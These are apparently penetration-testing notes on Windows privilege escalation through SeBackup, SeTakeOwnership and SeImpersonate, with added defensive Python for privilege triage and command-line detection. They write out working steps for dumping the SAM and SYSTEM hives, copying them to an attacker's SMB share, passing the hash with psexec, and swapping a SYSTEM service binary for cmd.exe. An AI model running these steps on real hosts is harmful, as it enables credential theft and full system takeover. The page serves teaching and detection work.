# Abusing privileges

**To view the privileges of the current user:**

```powershell
C:\> whoami /priv
```

### SeBackup / SeRestore

The `impacket` tool suite can be used for tasks such as starting an *SMB* server, dumping secrets from Windows registry hives, and running commands with `psexec`, among many others.

Refer to my `impacket` notes for more information:

{% embed url="<https://jarrettgxz-sec.gitbook.io/penetration-testing-ethical-hacking/tools-services/general/impacket>" %}

Suppose we have gained a remote shell on a server where the `SeBackup` and `SeRestore` privileges are enabled:

```powershell
C:\target> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
```
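A small triage script for the `whoami /priv` listing above, added here as an example in Python (it is not part of the original notes). It parses the table and flags the privileges this page covers as abusable, keying on the privilege name column only, since the descriptions change with the system locale. It reports privileges shown as `Disabled` too, because a privilege that is present in the token can be enabled by the process itself; only one that is absent is out of reach. The sample listing at the bottom is constructed, not captured from a real host.

```python
"""Triage a `whoami /priv` listing for privileges that commonly lead to SYSTEM.

Added example (not from the original notes). Run with --stdin and pipe the
output of `whoami /priv` in, or run as-is to process the constructed sample.
"""
import re
import sys

# Privileges covered on this page and why each matters. The names are fixed
# Windows constants; the Description column varies by locale, so it is ignored.
ABUSABLE = {
    "SeBackupPrivilege": "read any file or hive regardless of its ACL (e.g. reg save of SAM/SYSTEM)",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any object, then grant itself access with icacls",
    "SeImpersonatePrivilege": "impersonate tokens of clients that authenticate to it",
    "SeAssignPrimaryTokenPrivilege": "start a new process under a token obtained by impersonation",
}

# One table row: privilege name, free-text description, then the State column.
ROW = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)$")


def parse_privileges(text):
    """Return {privilege_name: state} for every row of a `whoami /priv` table."""
    privs = {}
    for line in text.splitlines():
        match = ROW.match(line.strip())
        if match:
            privs[match.group(1)] = match.group(2)
    return privs


def flag_abusable(privs):
    """Return sorted (name, state, reason) tuples for privileges worth a closer look.

    A privilege shown as Disabled is still held by the token and can be enabled
    by the holder (AdjustTokenPrivileges), so it is reported as well.
    """
    return sorted(
        (name, state, ABUSABLE[name])
        for name, state in privs.items()
        if name in ABUSABLE
    )


# Constructed sample listing (not captured from a real host).
SAMPLE_WHOAMI = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeBackupPrivilege             Back up files and directories             Disabled
SeRestorePrivilege            Restore files and directories             Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

if __name__ == "__main__":
    text = sys.stdin.read() if "--stdin" in sys.argv else SAMPLE_WHOAMI
    for name, state, reason in flag_abusable(parse_privileges(text)):
        print(f"{name:<30} {state:<9} {reason}")
```

On the sample, the script flags `SeBackupPrivilege` (Disabled), `SeImpersonatePrivilege` and `SeRestorePrivilege`; the two remaining rows are ordinary privileges every interactive user holds. The same parser works on the listing of a service account when reviewing who has been granted these rights through the User Rights Assignment policy.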

Because `SeBackupPrivilege` lets us read files and registry hives regardless of their ACLs, we can save the `SAM` and `SYSTEM` registry hives to a location of our choice (`C:\Users\jarrett\system.hive` and `C:\Users\jarrett\sam.hive` in this case):

```powershell
C:\target> reg save hklm\system C:\Users\jarrett\system.hive
C:\target> reg save hklm\sam C:\Users\jarrett\sam.hive
```

The command below starts a simple *SMB* server on the attacker machine with a share named `public` backed by the local `share` directory. Files copied from the target machine to that share land in the `share` folder.

***Attacker machine***

```bash
attacker@attacker_ip:~$ impacket-smbserver -smb2support -username jarrett -password mynamejeff public share
```

The command below copies `system.hive` and `sam.hive` from the specified directory on the target to the share on the attacker machine.

***Target machine***

```powershell
C:\target> copy c:\users\jarrett\system.hive \\<attacker_ip>\public\
C:\target> copy c:\users\jarrett\sam.hive \\<attacker_ip>\public\
```

**The next few commands should be run from the attacker machine**

The command below dumps the hashes from the `sam.hive` and `system.hive` files in the current folder (the `LOCAL` target tells `secretsdump` to parse local hive files instead of connecting to a remote host).

```bash
attacker@attacker_ip:~/share$ ls 
sam.hive system.hive

attacker@attacker_ip:~/share$ impacket-secretsdump -sam sam.hive -system system.hive LOCAL
Impacket vxxx - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: ...
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
...:::
Guest:xxx:xxx:xxx::
Administrator:xx12xx:xx34xx::
...
```

The command below uses the hash pair recovered by `impacket-secretsdump` above to authenticate as the ***administrator*** user. This provides us with a remote shell as the *administrator* user on the target Windows machine.

```bash
attacker@attacker_ip:~/share$ impacket-psexec -hashes xx12xx:xx34xx administrator@10.10.x.x
...

C:\Windows\system32> 
```

### SeTakeOwnership

This privilege allows a user to take ownership of any securable object on the system, including files and registry keys.

```powershell
C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                              State
============================= ======================================== ========
SeTakeOwnershipPrivilege      Take ownership of files or other objects Enabled
...
```

Suppose we have found a service on the target system that executes an `.exe` file with `SYSTEM` privileges (an example would be `utilman.exe`). Let's name that file `priv.exe`. Thanks to our `SeTakeOwnership` privilege, we can take ownership of that file with the command below:

```powershell
C:\> takeown /f C:\Windows\System32\priv.exe
```

At this point, we are able to grant ourselves any permissions we need on the file. The command below gives our current user (*jarrett*) full access (`F`) to the `priv.exe` file at the specified location.

```powershell
C:\> icacls C:\Windows\System32\priv.exe /grant jarrett:F
```

Finally, we can copy any file of choice to the target file we have full access to:

> Make sure the terminal's working directory is correct when using relative paths, or provide the full path instead.

The command below copies `cmd.exe` over `priv.exe`:

```powershell
C:\Windows\System32> copy cmd.exe priv.exe
```

Whenever the service mentioned above starts, it now runs our copy of `cmd.exe`, giving us a command prompt with `SYSTEM` privileges.
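Both the hive-dump steps in the `SeBackup` / `SeRestore` section (`reg save hklm\sam`, `reg save hklm\system`) and the ownership-and-swap steps above (`takeown`, `icacls /grant ...:F`, `copy` into `System32`) leave distinctive command lines in process-creation telemetry. The Python below, added here as an example and not part of the original notes or of any tool the page mentions, runs four detection rules over constructed records shaped like the fields a Sysmon Event ID 1 or Security 4688 event carries (user, working directory, command line). The rule names, the `Finding` class and the sample records are all assumptions made for the example; the hive names and command syntax are the standard Windows ones.

```python
"""Detection rules for the hive-dump and binary-swap command lines on this page.

Added example (not from the original notes). Each record mimics a Sysmon
Event ID 1 / Security 4688 event: user, process working directory, command line.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    rule: str
    user: str
    command_line: str


# SAM, SYSTEM and SECURITY are the hives whose export yields local hashes and secrets.
HIVE_RE = re.compile(r"^(?:hklm|hkey_local_machine)\\(?:sam|system|security)$", re.I)
SYSTEM32 = "\\windows\\system32\\"
GRANT_FULL_RE = re.compile(r"^[^:]+:\(?f\)?$", re.I)  # icacls 'user:F' or 'user:(F)'


def _exe_name(token):
    return ntpath.basename(token).lower().removesuffix(".exe")


def _argv(command_line):
    """Whitespace tokenizer (quoted paths with spaces are not handled; the sample
    has none). A leading 'cmd /c' or 'cmd /k' is dropped so the built-in copy is
    seen the same way whether typed interactively or launched through cmd.exe."""
    argv = command_line.split()
    if len(argv) >= 2 and _exe_name(argv[0]) == "cmd" and argv[1].lower() in ("/c", "/k"):
        argv = argv[2:]
    return argv


def _resolve(path, cwd):
    """Lower-cased normalised path; relative paths are resolved against cwd."""
    if not (ntpath.isabs(path) or ":" in path):
        path = ntpath.join(cwd, path)
    return ntpath.normpath(path).lower()


def rule_hive_save(argv, cwd):
    """reg save/export of SAM, SYSTEM or SECURITY (SeBackupPrivilege abuse)."""
    return (len(argv) >= 3 and _exe_name(argv[0]) == "reg"
            and argv[1].lower() in ("save", "export") and bool(HIVE_RE.match(argv[2])))


def rule_takeown_system32(argv, cwd):
    """takeown /f on a file under System32 (SeTakeOwnershipPrivilege abuse)."""
    if not argv or _exe_name(argv[0]) != "takeown":
        return False
    return any(tok.lower() == "/f" and SYSTEM32 in _resolve(argv[i + 1], cwd)
               for i, tok in enumerate(argv[1:-1], start=1))


def rule_icacls_grant_system32(argv, cwd):
    """icacls granting full control on a System32 file to some principal."""
    if len(argv) < 4 or _exe_name(argv[0]) != "icacls" or SYSTEM32 not in _resolve(argv[1], cwd):
        return False
    return any(tok.lower().startswith("/grant") and GRANT_FULL_RE.match(argv[i + 1])
               for i, tok in enumerate(argv[2:-1], start=2))


def rule_copy_exe_into_system32(argv, cwd):
    """copy whose destination is an executable under System32 (the binary swap)."""
    if len(argv) < 3 or _exe_name(argv[0]) != "copy":
        return False
    dest = _resolve(argv[-1], cwd)
    return SYSTEM32 in dest and dest.endswith(".exe")


RULES = {
    "hive_dump_via_reg_save": rule_hive_save,
    "takeown_on_system32": rule_takeown_system32,
    "icacls_grant_full_on_system32": rule_icacls_grant_system32,
    "copy_exe_into_system32": rule_copy_exe_into_system32,
}


def scan(events):
    """Apply every rule to every record; return findings in input order."""
    findings = []
    for ev in events:
        argv = _argv(ev["command_line"])
        if not argv:
            continue
        for name, rule in RULES.items():
            if rule(argv, ev["cwd"]):
                findings.append(Finding(name, ev["user"], ev["command_line"]))
    return findings


# Constructed records (not from a real host): five retrace this page's steps,
# two (reg query, a copy outside System32) are benign controls.
SAMPLE_EVENTS = [
    {"user": r"TARGET\jarrett", "cwd": r"C:\target",
     "command_line": r"reg save hklm\system C:\Users\jarrett\system.hive"},
    {"user": r"TARGET\jarrett", "cwd": r"C:\target",
     "command_line": r"reg save HKLM\SAM C:\Users\jarrett\sam.hive"},
    {"user": r"TARGET\jarrett", "cwd": r"C:\target",
     "command_line": r"reg query hklm\software\microsoft\windows\currentversion\run"},
    {"user": r"TARGET\jarrett", "cwd": r"C:\target",
     "command_line": r"takeown /f C:\Windows\System32\priv.exe"},
    {"user": r"TARGET\jarrett", "cwd": r"C:\target",
     "command_line": r"icacls C:\Windows\System32\priv.exe /grant jarrett:F"},
    {"user": r"TARGET\jarrett", "cwd": r"C:\Windows\System32",
     "command_line": r"cmd.exe /c copy cmd.exe priv.exe"},
    {"user": r"TARGET\jarrett", "cwd": r"C:\Users\jarrett",
     "command_line": r"copy notes.txt D:\backup\notes.txt"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.user}: {f.command_line}")
```

The copy rule resolves a relative destination against the recorded working directory, which is what catches the `copy cmd.exe priv.exe` form used above when run from inside `System32`. These rules only see command lines, so they miss the same actions done through the registry and file APIs directly; pair them with file-creation events for `.hive` files, SMB egress from the host, and a periodic review of which accounts hold `SeBackupPrivilege`, `SeRestorePrivilege` and `SeTakeOwnershipPrivilege` under User Rights Assignment.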

{% embed url="<https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown>" %}

### SeImpersonate / SeAssignPrimaryToken

* `SeImpersonate`: Privilege that allows a user to impersonate another user's security context.
* `SeAssignPrimaryToken`: Privilege that allows a new security token to be assigned to a process. This allows that process to run as a higher-privileged user (such as `SYSTEM`).

Breakdown of how the `RogueWinRM` exploit tool works (as of the time of writing, I wasn't able to find a comprehensive technical guide on how it works, so I have pieced together the key points from research on the main concepts involved in this exploit):

1. The Background Intelligent Transfer Service (*BITS*) is started, which automatically initiates a connection to port 5985 (used by *WinRM*) with `SYSTEM` privileges.

   * Port 5985 is typically used by the *WinRM* service, which exposes a *PowerShell* console for remote use over the network.
   * The SYSTEM-level authentication credentials can be captured from the above-mentioned connection to *WinRM* on the local target machine (port 5985).

2. The captured authentication credentials can be used to execute a malicious payload of choice (specified as an argument to the `RogueWinRM` tool) with SYSTEM-level privileges. This is possible because the `SeImpersonate` and `SeAssignPrimaryToken` privileges are set on the user on the target machine.
   * A reverse shell connection can be established to a remote attacker server, essentially providing a SYSTEM-level shell.

{% embed url="<https://github.com/antonioCoco/RogueWinRM>" %}

{% embed url="<https://learn.microsoft.com/en-us/windows/win32/bits/background-intelligent-transfer-service-portal>" %}
BITS service
{% endembed %}

***Windows privileges to admin list***

{% embed url="<https://github.com/gtworek/Priv2Admin>" %}
